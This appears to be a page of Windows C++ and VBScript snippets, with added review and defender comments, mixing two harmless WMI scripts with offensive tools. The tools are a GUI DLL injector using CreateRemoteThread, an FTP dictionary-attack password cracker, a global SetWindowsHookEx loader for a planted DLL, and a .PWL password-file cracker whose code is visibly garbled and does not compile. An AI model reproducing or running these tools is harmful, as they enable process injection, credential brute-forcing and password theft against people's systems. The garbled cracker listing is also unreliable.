
DLL injection with GUI

Example of DLL injection with a GUI in C++
//DLL injection with GUI
#include
#include
/* Declare Windows procedure (defined further down; handles WM_CREATE / WM_COMMAND / WM_DESTROY) */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Make the class name into a global variable: used both to register the class and to create the window */
char szClassName[ ] = "WindowsApp";
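// Process entry point: registers the window class, creates the injector window and
// pumps messages until WM_QUIT. Returns the WM_QUIT exit code, or 0 on setup failure.
// hPrevInstance, lpszArgument and nFunsterStil are unused (as in the original).
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
    (void)hPrevInstance;
    (void)lpszArgument;
    (void)nFunsterStil;

    // Zero-initialise so no field of the class description is left indeterminate.
    WNDCLASSEX wincl = {};
    wincl.cbSize = sizeof (WNDCLASSEX);
    wincl.style = CS_DBLCLKS;
    wincl.lpfnWndProc = WindowProcedure;
    wincl.cbClsExtra = 0;
    wincl.cbWndExtra = 0;
    wincl.hInstance = hThisInstance;
    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    // A system-colour brush is passed as (colour index + 1). The original wrote
    // "(HBRUSH) COLOR_BACKGROUND+7", which casts first and then does pointer
    // arithmetic on the handle, so it did not name a valid system-colour brush.
    wincl.hbrBackground = (HBRUSH) (COLOR_BACKGROUND + 1);
    wincl.lpszMenuName = NULL;
    wincl.lpszClassName = szClassName;
    if (!RegisterClassEx (&wincl)) {
        return 0;
    }

    HWND hwnd = CreateWindowEx (
        0,
        szClassName,
        "The Game Injector ",
        WS_SYSMENU|WS_VISIBLE,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        400,
        200,
        HWND_DESKTOP,
        NULL,
        hThisInstance,
        NULL
    );
    // Without a window no WM_QUIT is ever posted and the loop below would never end.
    if (hwnd == NULL) {
        return 0;
    }

    MSG messages = {};
    // GetMessage returns -1 on error; only a positive result carries a message.
    while (GetMessage (&messages, NULL, 0, 0) > 0) {
        TranslateMessage(&messages);
        DispatchMessage(&messages);
    }
    return (int) messages.wParam;
}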
// Handles of the three controls created in WM_CREATE: the two edit boxes
// (target process name, DLL path) and the INJECT button.
HWND Input1,Input2;
HWND Inject;
// Enables one named privilege (the caller passes SE_DEBUG_NAME) in the current process token.
// Returns AdjustTokenPrivileges' raw result, or 0 if the token could not be opened.
// NOTE(review): LookupPrivilegeValue's result is not checked, and AdjustTokenPrivileges
// returns nonzero even when the privilege was not assigned (it reports that case through
// GetLastError() == ERROR_NOT_ALL_ASSIGNED), so a nonzero return here does not prove the
// privilege is actually held.
// Defender note: adjusting privileges on a process token is auditable (Windows "Audit Token
// Right Adjusted", event 4703 on versions that support it); SeDebugPrivilege being enabled by
// a binary that is not a debugger is a useful hunting signal.
BOOL SetPrivilege(LPSTR type) // more flexible
{
HANDLE Htoken;
TOKEN_PRIVILEGES tokprivls;
// TOKEN_ADJUST_PRIVILEGES on our own token is all that is needed to change its privilege set.
if(!OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &Htoken)){
return 0;
}
tokprivls.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, type, &tokprivls.Privileges[0].Luid); // return value unchecked
tokprivls.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
BOOL Success =AdjustTokenPrivileges( Htoken, FALSE, &tokprivls, sizeof(tokprivls), NULL, NULL);
CloseHandle(Htoken);
return Success;
}
// Walks a Toolhelp snapshot for a process whose image name equals proc (case-insensitive)
// and returns a PROCESS_ALL_ACCESS handle to it.
// NOTE(review): two defects in the visible code: (1) when nothing matches, control falls off
// the end of a non-void function without a return, so the caller receives an indeterminate
// HANDLE (undefined behaviour; InjectDll's `if(hProcess)` test cannot rely on it); (2) on a
// match the function returns before CloseHandle(Snap), leaking the snapshot handle. The
// Process32First return value is also unchecked.
// Defender note: opening another process with PROCESS_ALL_ACCESS after enabling
// SeDebugPrivilege is exactly the access pattern that process-access auditing and
// Sysmon event 10 (ProcessAccess) are meant to surface.
HANDLE GetHandle(char *proc)
{
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32); // must be set before Process32First
HANDLE Snap = CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
Process32First(Snap,&pe32);
do{
if(stricmp(pe32.szExeFile,proc)==0)
{
SetPrivilege(SE_DEBUG_NAME); // needed to open processes owned by other users/services
return OpenProcess(PROCESS_ALL_ACCESS,0,pe32.th32ProcessID);
}}while(Process32Next(Snap,&pe32));CloseHandle(Snap);
}
// Loads the DLL at `path` into the process named `Name`: writes the path string into the
// target's address space and starts a remote thread at LoadLibraryA with that string as its
// argument. Shows a message box if no process handle could be obtained.
// NOTE(review): DllPath = strlen(path)+20 makes WriteProcessMemory copy 20 bytes beyond the
// terminator of `path`; that is in-bounds only because the caller passes the 260-byte global
// `dll`. VirtualAllocEx and WriteProcessMemory results are not checked before use, the
// LoadLibraryA address is resolved in this process and assumed (not verified) to be identical
// in the target, and hProcess is never closed. The `LoadLi`/`brary` split below is an
// extraction line-wrap inside the identifier LoadLibrary.
// Defender note: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread with a LoadLibrary
// start address is the classic remote-thread injection pattern reported by Sysmon event 8
// (CreateRemoteThread) and by EDR remote-thread telemetry (MITRE ATT&CK T1055).
void InjectDll(char* Name, char *path)
{
HANDLE hProcess = GetHandle(Name);
if(hProcess){
int DllPath = strlen(path) + 20;
LPVOID MemSp = VirtualAllocEx(hProcess,NULL,DllPath,MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(hProcess,MemSp,path,DllPath,NULL);
HANDLE hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)GetProcAddress(LoadLi
brary("Kernel32.dll"), "LoadLibraryA"), MemSp, 0, NULL);
if(hThread){
// Wait up to 30 s for the remote LoadLibraryA call (and the DLL's DllMain) to finish.
WaitForSingleObject(hThread, 30000);
CloseHandle(hThread);
}
VirtualFreeEx(hProcess, MemSp, 0, MEM_RELEASE);
}
else {MessageBox(0,"Could not get the process handle .",0,0);}
}
// Text read from the two edit controls when INJECT is pressed: proc = target image name,
// dll = path of the DLL to load. 260 presumably mirrors MAX_PATH.
char proc[50],dll[260];
// Window procedure for the injector window. WM_CREATE builds the controls; WM_COMMAND with
// control id 100 (the INJECT button) copies the two edit boxes into the globals proc/dll and
// calls InjectDll; WM_DESTROY ends the message loop.
// NOTE(review): `if(proc!=0)` and `if(dll!=0)` compare array addresses to null and are
// therefore always true -- they do not detect an empty edit box. hFont is created on every
// WM_CREATE and never released with DeleteObject, and LoadImage's result is not checked
// before it is handed to STM_SETIMAGE.
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
HWND hBmpStat;
HBITMAP hBitmap;
HFONT hFont ;
switch (message)
{
case WM_CREATE:
hFont = CreateFont(20, 0, 0, 10, FW_DONTCARE, 0, 0, 0, ANSI_CHARSET, OUT_TT_PRECIS, CLIP_TT_ALWAYS, DEFAULT_QUALITY, FF_DONTCARE, "Microsoft Sans MS");
// Bitmap loaded from a fixed path under system32 into a zero-sized static control
// placed at (-200,-220), i.e. apparently outside the visible client area.
hBitmap = (HBITMAP) LoadImage(NULL, "C:\\WINDOWS\\system32\\setup.bmp", IMAGE_BITMAP, 0, 0, LR_LOADFROMFILE);
// zomfg h4x
hBmpStat = CreateWindowEx(0,"Static","",WS_VISIBLE | WS_CHILD | SS_BITMAP,
-200,-220,0,0,hwnd,0,0,0);
SendMessage(hBmpStat, STM_SETIMAGE, IMAGE_BITMAP, (LPARAM) hBitmap);
// Control id 100 is what the WM_COMMAND case below matches on.
Inject = CreateWindow("Button","INJECT",WS_CHILD | WS_VISIBLE | WS_BORDER,
190, 20, 180, 38,hwnd,(HMENU)100,0,NULL);
// Default target process name and DLL path pre-filled in the edit boxes.
Input1 = CreateWindow("Edit", "wmplayer.exe",WS_CHILD | WS_VISIBLE | WS_BORDER,
10, 20, 180,18,hwnd,0,0,NULL);
Input2 = CreateWindow("Edit", "c:\\sample.dll",WS_CHILD | WS_VISIBLE | WS_BORDER,
10, 40, 180,18,hwnd,0,0,NULL);
SendMessage(Inject,WM_SETFONT,WPARAM(hFont),0);
break;
case WM_DESTROY:
PostQuitMessage (0);
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case 100:
// WM_GETTEXT's wParam is the buffer size including the terminator, so the copy is bounded.
SendMessage(Input1,WM_GETTEXT,sizeof(proc),LPARAM(proc));
if(proc!=0)
{
SendMessage(Input2,WM_GETTEXT,sizeof(dll),LPARAM(dll));
if(dll!=0)
InjectDll(proc,dll);
}break;
default:break;
}break;
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}
return 0;
}

WMI: Rename a Computer

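' Renames the local computer ("." = this machine) through WMI's Win32_ComputerSystem.Rename.
' Requires administrative rights; the new name only takes effect after a restart.
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colComputers = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objComputer in colComputers
    ' Rename returns 0 on success, otherwise a Win32 error code; the original ignored it.
    errReturn = objComputer.Rename("NewName")
    If errReturn = 0 Then
        ' objComputer.Name still holds the value fetched by the query, so it is not used
        ' to report the new name here.
        WScript.Echo "Rename to NewName requested; it takes effect after a restart."
    Else
        WScript.Echo "Rename failed with error code " & errReturn
    End If
Next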

Crack FTP Account using Dictionary (C++)

An example of how to crack an FTP account using a dictionary attack
//Crack FTP Account using Dictionary (C++)
#include
#include
// printf-style helper: formats msg into a fixed 256-byte stack buffer and sends it on sock.
// Returns send()'s result (bytes sent, or SOCKET_ERROR).
// NOTE(review): vsprintf has no length bound, so a formatted line longer than 255 bytes
// overruns szBuffer (stack buffer overflow). Callers pass user-controlled dictionary entries
// through this path.
int wsend(SOCKET sock,char*msg,...)
{
char szBuffer[256];
va_list va;
va_start (va, msg);
vsprintf (szBuffer, msg, va);
va_end (va);
return ( send(sock,szBuffer,strlen(szBuffer),0 ) );
}
// Performs one FTP login attempt against sock_in with szUser/szPass and returns 1 when the
// server answers the PASS command with a 230 reply, 0 otherwise. The nested ifs expect
// 220 (banner), 331 (need password), 230 (logged in) in that order.
// NOTE(review): szBuffer is never NUL-terminated -- recv() may fill all 256 bytes and writes
// no terminator, so every strstr() here reads unterminated/uninitialised memory (undefined
// behaviour). recv() returning 0 (peer closed) is not SOCKET_ERROR and is treated as data.
// closesocket() is also called when socket() returned INVALID_SOCKET.
// Defender note: each call is a full USER/PASS exchange, so a run of failed logins for one
// user from one source address is what server-side lockout, rate limiting and log-based
// blocking detect; plaintext FTP additionally exposes every credential tried on the wire.
BOOL CheckValidation(struct sockaddr_in sock_in,char*szUser,char*szPass)
{
BOOL bResult=0;
char szBuffer[256];
SOCKET sock = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
if(sock!=INVALID_SOCKET)
if( connect(sock,(struct sockaddr*)&sock_in,sizeof(sock_in))==0)
if(recv(sock,szBuffer,256,0)!=SOCKET_ERROR)
if(strstr(szBuffer,"220"))
{
if(wsend(sock,"USER %s\r\n",szUser)!=SOCKET_ERROR)
if(recv(sock,szBuffer,256,0)!=SOCKET_ERROR)
if(strstr(szBuffer,"331"))
{
if(wsend(sock,"PASS %s\r\n",szPass)!=SOCKET_ERROR)
if(recv(sock,szBuffer,256,0)!=SOCKET_ERROR)
if(strstr(szBuffer,"230"))
bResult = 1;
}else printf("No such user ( %s )\r\n",szUser); // dangling else: binds to the 331 test
}else printf("ftp server not ready \r\n"); // binds to the 220 test
Sleep(100); // fixed 100 ms pause between attempts
closesocket(sock);
return bResult;
}
// Entry point: reads the word list "test.txt", resolves the hard-coded host
// "ftp.server.net", and tries each line after the first as the password for "UserName".
// NOTE(review): szBuffer is malloc'd with dwSize+20 bytes but only dwSize are written and no
// terminator is stored, so strtok() can run past the data (undefined behaviour).
// CloseHandle(hFile) is executed even when CreateFile returned INVALID_HANDLE_VALUE, and
// s_in is never zeroed (sin_zero left indeterminate). gethostbyname is deprecated and
// getch() needs <conio.h>.
int main()
{
char*szBuffer;
WSADATA wdata;
struct sockaddr_in s_in;
s_in.sin_family=AF_INET;
s_in.sin_port =htons(21); // FTP control port
char szFile[25]="test.txt",
szUser[25]="UserName",
*pntr;
BOOL bResult=0;
HANDLE hFile = CreateFile(szFile,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(hFile!=INVALID_HANDLE_VALUE)
{
DWORD dwSize = GetFileSize(hFile,0),
dwReadBytes=0;
if(dwSize!=0)
{
szBuffer=(char*)malloc(dwSize+20);
if(szBuffer!=0)
{
if( ReadFile(hFile,szBuffer,dwSize,&dwReadBytes,0) )
{
if(dwReadBytes==dwSize)
{
if ( !WSAStartup(0x202,&wdata) )
{
LPHOSTENT honte = gethostbyname("ftp.server.net");
if( honte )
{
s_in.sin_addr=*((LPIN_ADDR)*honte->h_addr_list); // first resolved address only
pntr=strtok(szBuffer,"\r\n");//ignore first line
// Each subsequent CRLF-delimited line is tried as a password until one matches.
while(0 !=pntr)
if( 0!=(pntr=strtok(NULL,"\r\n")))
if(CheckValidation(s_in,szUser,pntr))
{
printf("User cridentials matched .'%s' '%s' \r\n",szUser,pntr);
break;
}
else printf("No match with user '%s' with password '%s'\r\n",szUser,pntr);
}else printf("Unable to resolve given address\r\n");
}WSACleanup();
}else printf("Failed to read complete file\r\n");
}else printf("Unable to read file\r\n");
free(szBuffer);
}else printf("Unable to allocate necessary memory\r\n");
}else printf("Unable to get file size\r\n");
}else printf("Error Opening File\r\n");
CloseHandle(hFile); // also reached when hFile is INVALID_HANDLE_VALUE
printf("Finished try.Press any key to exit\r\n");
getch();
return 0;
}

Get the computer password (C++)

//Get the computer password
# include
# include
# include
# include
# include
# include
# include

/* Raw contents of the .PWL file. `huge` is a 16-bit DOS/Borland far-memory keyword, not standard C. */
unsigned char huge Data[100001];
/* Recovered keystream bytes; the code below caps the initial copy at 1000. */
unsigned char keystream[1001];
/* Start offsets of the resource blocks inside Data (filled while scanning the file). */
int Rpoint[300];

/*
 * NOTE(review): this listing is damaged by extraction. Text between angle brackets was
 * stripped (loop headers such as `for(i=0;i;` and every subscript on `name`, `keystream`,
 * `Data`, `Rall` and `Rpoint`), the delimiters around the section comments (`Read PWL file`,
 * `Find Username`, ...) were lost so they now sit as bare text, and printf format strings
 * were split at their newlines. It does not compile as shown; the comments below describe
 * the apparent intent and should be read with that caveat.
 *
 * Apparent purpose: read a Windows 9x .PWL password-cache file, recover keystream from the
 * known-plaintext user name, and print the decrypted resource blocks. `void main`, `huge`
 * and getch() tie it to 16-bit Borland C.
 * Defender note: the file format this works on is obsolete; the lasting lesson is the
 * classic one that a stream cipher keyed from a predictable value and reused across
 * records yields to known-plaintext keystream recovery.
 */
void main(int argc,char *argv[]){
FILE *fd;
int i,j;
int size;
char ch;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300]; Resourse allocation table 

if(argc<2){
printf("usage: glide filename (username)");
exit(1);
}
Read PWL file 

/* Slurp the whole file into Data. There is no bound check against sizeof Data (100001),
 * and the feof() loop stores one extra byte at EOF, which the size-- below drops. */
fd=fopen(argv[1],"rb");
if(fd==NULL){
printf("can't open file %s",argv[1]);
exit(1);
}
size=0;
while(!feof(fd)){
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);

Find Username 
/* The user name defaults to the file name (presumably because PWL files are named after
 * the user) and can be overridden by argv[2]. */
name=argv[1];
if(argc>2)name=argv[2];
printf("Username:%s
",name);

Copy encrypted text into keystream 
/* Ciphertext starts at file offset 0x208; copy up to 1000 bytes of it. */
cracked=size-0x0208;
if(cracked<0)cracked=0;
if(cracked>1000)cracked=1000;
memcpy(keystream,Data+0x208,cracked);

Generate 20 bytes of keystream 
/* Known-plaintext step: the first plaintext bytes are apparently the upper-cased user
 * name, so XORing it into the copied ciphertext leaves real keystream in the first
 * 20 positions (subscripts on name/keystream lost to extraction). */
for(i=0;i<20;i++){
ch=toupper(name);
if(ch==0)break;
if(ch=='.')break;
keystream^=ch;
};
cracked=20;

Find allocated resources 

/* The first two keystream bytes mask the stored resource sizes (see rsz^=sizemask). */
sizemask=keystream[0]+(keystream[1]<<8);
printf("Sizemask:%04X
",sizemask);

/* Resource allocation table. NOTE(review): Rall and maxr are read/incremented before
 * ever being initialised (undefined behaviour). */
for(i=0;i<256;i++){
if(Data!=0xff){
Rall[Data]++;
if(Data>maxr)maxr=Data;
}
}

maxr=(((maxr/16)+1)*16); Resourse pointer table size appears to be
divisible by 16 

Search after resources 

/* Walk the resource blocks from the first one; an unused resource with a nonzero size
 * triggers an interactive recovery prompt. */
Rpoint[0]=0x0208+2*maxr+20+2; First resources 
for(i=0;i;
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
printf("Analysing block with size:%04x (%d:%d)
",rsz,i,Rall);
if((Rall==0)&&(rsz!=0)){
printf("Unused resourse has nonzero size!!!
");
printf("If last line produed any:You may try to recover
");
printf("Press y to attempt the recovery
");
ch=getch();
if(ch!='y')exit(0);
rsz=2;
i=i-1;
}
pos=pos+rsz;

Resourse have a tedency to have the wrong size for some reason
Chech for correct size

/* Extend the recovered keystream using the now-known resource pointer bytes. */
if(i & 0x00ff;
keystream[21+2*i]^=(Rpoint>>8) & 0x00ff;
}
cracked+=maxr*2+2;
printf("%d Bytes of ketstream recoverd 
",cracked);

Decrypt resources 
/* XOR each resource with the recovered keystream (bounded by `cracked`) and print it. */
for(i=0;i;
if(rsz>cracked)rsz=cracked;
printf("Resource[%d](%d)
",i,rsz);
for(j=0;j+j]^keystream[j]);
printf("
");
}
exit(0);
}

WMI: Get DNS Host Name

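' Prints the local machine's names from Win32_ComputerSystem. Name is the computer
' (NetBIOS) name; DNSHostName is the DNS host name the heading refers to, which the
' original script did not print.
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objItem in colItems
    Wscript.Echo "Computer Name: " & objItem.Name
    Wscript.Echo "DNS Host Name: " & objItem.DNSHostName
Next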

Hooking Notepad.exe (c++)

//Hooking Notepad in c++
#include <windows.h>;
// Loads c:\windows\notepad.dll and installs its exported SysMessageProc as a
// WH_SYSMSGFILTER hook for all threads on the desktop (thread id 0).
// NOTE(review): LoadLibrary and GetProcAddress results are never checked; if the DLL is
// missing, hkprcSysMsg is NULL and SetWindowsHookEx fails silently. The (LPCTSTR) cast on a
// narrow string literal is wrong when UNICODE is defined (LoadLibraryA or TEXT() would be
// correct). The program returns immediately with no message loop, so the hook presumably
// does not outlive the process -- verify. "notepad.dll" is not a Windows component; it is
// content supplied alongside this program.
// Defender note: a global SetWindowsHookEx hook causes the hook DLL to be mapped into other
// GUI processes (MITRE ATT&CK T1055); an unsigned, un-inventoried DLL in %WINDIR% plus a
// SetWindowsHookEx call from an unexpected binary is a common injection indicator.
int main()
{
HOOKPROC hkprcSysMsg;
static HINSTANCE hinstDLL;
static HHOOK hhookSysMsg;
hinstDLL = LoadLibrary((LPCTSTR) "c:\\windows\\notepad.dll");
hkprcSysMsg = (HOOKPROC)GetProcAddress(hinstDLL, "SysMessageProc");
hhookSysMsg = SetWindowsHookEx(WH_SYSMSGFILTER,hkprcSysMsg,hinstDLL,0);
return 0;
}